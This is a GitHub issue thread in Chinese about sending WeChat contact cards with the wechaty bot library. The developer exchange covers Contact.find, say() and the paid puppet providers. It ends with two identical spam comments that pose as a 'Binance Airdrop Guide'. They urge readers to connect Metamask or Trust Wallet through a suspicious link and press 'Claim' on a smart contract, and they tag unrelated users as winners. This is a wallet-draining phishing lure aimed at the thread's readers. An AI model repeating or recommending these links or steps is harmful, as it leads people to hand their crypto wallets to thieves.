### ISSUE TITLE
请问自定义收发个人名片这块好实现么

### ISSUE THREAD

**Issue by JingRen790838213** [xcosmosbox/wechaty-PaimonBot#2]
请问自定义收发个人名片这块好实现么

**Comment by xcosmosbox** [comment]
> 请问自定义收发个人名片这块好实现么

好实现，本项目所依赖的wechaty包中存在 Message.Contact 类，可以轻松实现收发个人名片。不论是人与人之间的还是聊天小组的。如果是个人可以设置为只要有新好友或者触发某种关键词就转发个人名片。

**Comment by JingRen790838213** [comment]
能说具体点么，
我看源码里面有这么一句
msgId = await puppet.messageSendContact(conversationId, sayable.id)，
是要diy一个provider才可以么，但diy provider文档内容好少，不知道如何下手

**Comment by JingRen790838213** [comment]
> > 请问自定义收发个人名片这块好实现么
> 
> 好实现，本项目所依赖的wechaty包中存在 Message.Contact 类，可以轻松实现收发个人名片。不论是人与人之间的还是聊天小组的。如果是个人可以设置为只要有新好友或者触发某种关键词就转发个人名片。

能说具体点么，
我看源码里面有这么一句
msgId = await puppet.messageSendContact(conversationId, sayable.id)，
是要diy一个provider才可以么，但diy provider文档内容好少，不知道如何下手

**Comment by xcosmosbox** [comment]
> > > 请问自定义收发个人名片这块好实现么
> > 
> > 
> > 好实现，本项目所依赖的wechaty包中存在 Message.Contact 类，可以轻松实现收发个人名片。不论是人与人之间的还是聊天小组的。如果是个人可以设置为只要有新好友或者触发某种关键词就转发个人名片。
> 
> 能说具体点么， 我看源码里面有这么一句 msgId = await puppet.messageSendContact(conversationId, sayable.id)， 是要diy一个provider才可以么，但diy provider文档内容好少，不知道如何下手

不需要diy，只需要通过获取（或者提前配置好）你想要发送的个人名片（不论是自己的还是别人的）。
通过 `bot.Contact.find({name: '联系人名字'})` 就能找到个人名片。然后使用 `say` 函数发送就行。
这是我找到的官方文档给的例子：
![image](https://user-images.githubusercontent.com/56502269/211141964-ce8bd110-e443-4d1c-906d-01cfc3f21500.png)
更多内容你可以看看这个文档：https://wechaty.gitbook.io/wechaty/api/message#Message

**Comment by JingRen790838213** [comment]
> > > > 请问自定义收发个人名片这块好实现么
> > > 
> > > 
> > > 好实现，本项目所依赖的wechaty包中存在 Message.Contact 类，可以轻松实现收发个人名片。不论是人与人之间的还是聊天小组的。如果是个人可以设置为只要有新好友或者触发某种关键词就转发个人名片。
> > 
> > 
> > 能说具体点么， 我看源码里面有这么一句 msgId = await puppet.messageSendContact(conversationId, sayable.id)， 是要diy一个provider才可以么，但diy provider文档内容好少，不知道如何下手
> 
> 不需要diy，只需要通过获取（或者提前配置好）你想要发送的个人名片（不论是自己的还是别人的）。 通过 `bot.Contact.find({name: '联系人名字'})` 就能找到个人名片。然后使用 `say` 函数发送就行。 这是我找到的官方文档给的例子： ![image](https://user-images.githubusercontent.com/56502269/211141964-ce8bd110-e443-4d1c-906d-01cfc3f21500.png) 更多内容你可以看看这个文档：https://wechaty.gitbook.io/wechaty/api/message#Message

这个功能早不支持了，都收费了

**Comment by xcosmosbox** [comment]
> > > > > 请问自定义收发个人名片这块好实现么
> > > > 
> > > > 
> > > > 好实现，本项目所依赖的wechaty包中存在 Message.Contact 类，可以轻松实现收发个人名片。不论是人与人之间的还是聊天小组的。如果是个人可以设置为只要有新好友或者触发某种关键词就转发个人名片。
> > > 
> > > 
> > > 能说具体点么， 我看源码里面有这么一句 msgId = await puppet.messageSendContact(conversationId, sayable.id)， 是要diy一个provider才可以么，但diy provider文档内容好少，不知道如何下手
> > 
> > 
> > 不需要diy，只需要通过获取（或者提前配置好）你想要发送的个人名片（不论是自己的还是别人的）。 通过 `bot.Contact.find({name: '联系人名字'})` 就能找到个人名片。然后使用 `say` 函数发送就行。 这是我找到的官方文档给的例子： ![image](https://user-images.githubusercontent.com/56502269/211141964-ce8bd110-e443-4d1c-906d-01cfc3f21500.png) 更多内容你可以看看这个文档：https://wechaty.gitbook.io/wechaty/api/message#Message
> 
> 这个功能早不支持了，都收费了

我看了下我自己写的代码，`message.talker()`可以获得Contact对象，你可以找找talker这个function现在有没有变成别的。

**Comment by JingRen790838213** [comment]
contactCard可以拿到，貌似是msg.say()这块已经不能传卡片了，用他们的provider，那些token还是挺贵的

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @Fahhd1400, @JayFang1993, @shuvo5cis, @sbravo15, @xuedezhang, @bluceliuljx, @Yasim77, @lingchingteng, @danielamarques01, @longcpp

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @DandelionCN, @Boyquotes, @Huykaka123, @charlesfrankie, @WMWMW1, @vrusua, @Karlheinzniebuhr, @vovkapoc, @fbrega10, @SuleimanEad
